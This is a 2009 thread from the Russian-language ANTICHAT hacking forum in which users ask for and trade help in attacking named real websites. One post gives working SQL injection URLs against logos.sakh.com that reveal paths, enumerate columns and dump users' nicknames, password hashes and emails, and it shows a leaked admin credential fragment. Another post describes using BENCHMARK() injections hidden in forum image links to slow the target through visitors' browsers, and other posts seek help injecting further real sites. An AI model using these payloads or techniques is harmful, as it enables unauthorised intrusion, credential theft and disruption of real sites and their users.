HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 25.12.2009, 03:52
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Цитата:
Сообщение от a1ertso  
Всмысле через промежуточный хост?
команды на шелле пашут хоть?)
 
Ответить с цитированием

  #2  
Старый 25.12.2009, 03:53
a1ertso
Новичок
Регистрация: 16.12.2009
Сообщений: 29
Провел на форуме:
101927

Репутация: 0
По умолчанию

Цитата:
Сообщение от .:[melkiy]:.  
команды на шелле пашут хоть?)
да)
 
Ответить с цитированием

  #3  
Старый 26.12.2009, 10:31
superboys
Познающий
Регистрация: 01.02.2008
Сообщений: 53
Провел на форуме:
136161

Репутация: 5
По умолчанию

http://logos.sakh.com/auth.php?name='&passw='
ваши идеи?
любой запрос игнорирует...
Мыслей нет.
 
Ответить с цитированием

  #4  
Старый 26.12.2009, 12:34
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию

Цитата:
Сообщение от superboys  
http://logos.sakh.com/auth.php?name='&passw='
ваши идеи?
любой запрос игнорирует...
Мыслей нет.
эмм..а что там не так? сайт ясно говорит - что логин\пассвор инкорект.Невижу уязвимости,хоть глаз выколи.
А вот если так,то уже кое что есть,раскрытия путей.
Код:
http://logos.sakh.com/auth.php?name[]=%27&passw[]=%27
А вот и скуля
Код:
http://logos.sakh.com/?view=comments%27+union+select+version%28%29,2,3+--+
Код:
http://logos.sakh.com/?view=comments%27+union+select+COLUMN_NAME,2,3+FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME=%27logos_users%27%20+limit+2,1+--+
Version: 5.0.82sp1-log
Админка: Z:jncjcb
Ничего интересного
Даже обидно(
Код:
http://logos.sakh.com/?view=comments%27+union+select+concat_ws%280x3a,nick,password,email%29,2,3+FROM%20logos_users+--+
Имей лимитом,если хочеш других пльзователей.привилегий на загрузку шела нет,а жаль.Хотя из админкиможно файлы править но там чтото недописано,и поэтому не получаеться)

Последний раз редактировалось m0Hze; 26.12.2009 в 13:14..
 
Ответить с цитированием

  #5  
Старый 26.12.2009, 13:50
Root-access
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440

Репутация: 648
По умолчанию

Цитата:
Сообщение от Strilo4ka  
На форумах есть возможность подгружать картинку с другого сайта, можно найти скуль иньекцию
потом втулить на форуме картинку, а в src
путь со скулей вбить и с функцией benchmark(),на популярном форуме (если конечно еще на src нет фильтра никакого ручными методами, тока еще все зависит от магикс_квотс на сервере где форум стоит, как обрабатываеться bb-код...)

Код:
BENCHMARK(count,expr) 
The BENCHMARK() function executes the expression expr repeatedly count times. It may be used to time how quickly MySQL processes the expression. The result value is always 0. The intended use is from within the mysql client, which reports query execution times:
При чем всегда будут ип пользователей, не твой
когда браузер будет у них интерпретировать то будет запрашывать картинку с сайта где скуль .

Эм, нам откуда знать, упадёт он или нет? Смотря сколько человек посмотрит картинку на форуме и какой сервер у сайта.
 
Ответить с цитированием

  #6  
Старый 26.12.2009, 17:11
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319

Репутация: -16
По умолчанию

Цитата:
http://www.aghamyan.am/biography.php?form_id=2'a
nekak ne moqu nayti columns..

pojalusta pomoqite..
 
Ответить с цитированием

  #7  
Старый 26.12.2009, 21:20
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

Цитата:
Сообщение от LokbatanLi  
nekak ne moqu nayti columns..

pojalusta pomoqite..
а я никак не могу инъекцию там найти..

мысль улавливаешь?
__________________
Feci, quod potui. Faciant meliora potentes.
 
Ответить с цитированием

  #8  
Старый 26.12.2009, 22:06
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


По умолчанию

Цитата:
Сообщение от LokbatanLi  
nekak ne moqu nayti columns..

pojalusta pomoqite..

как бы там только раскрытие путей.
http://www.aghamyan.am/biography.php?form_id[]=6
 
Ответить с цитированием

  #9  
Старый 26.12.2009, 23:51
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию

может кто поможет никак не могу обходит филтрацию редирект идет ((

Цитата:
http://investorshub.advfn.com/boards/boards_moderated.asp?user=-177571'+order+by+1{
 
Ответить с цитированием

  #10  
Старый 27.12.2009, 01:15
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию

Цитата:
Сообщение от YuNi|[c  
может кто поможет никак не могу обходит филтрацию редирект идет ((
ну спс за ответы ((
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.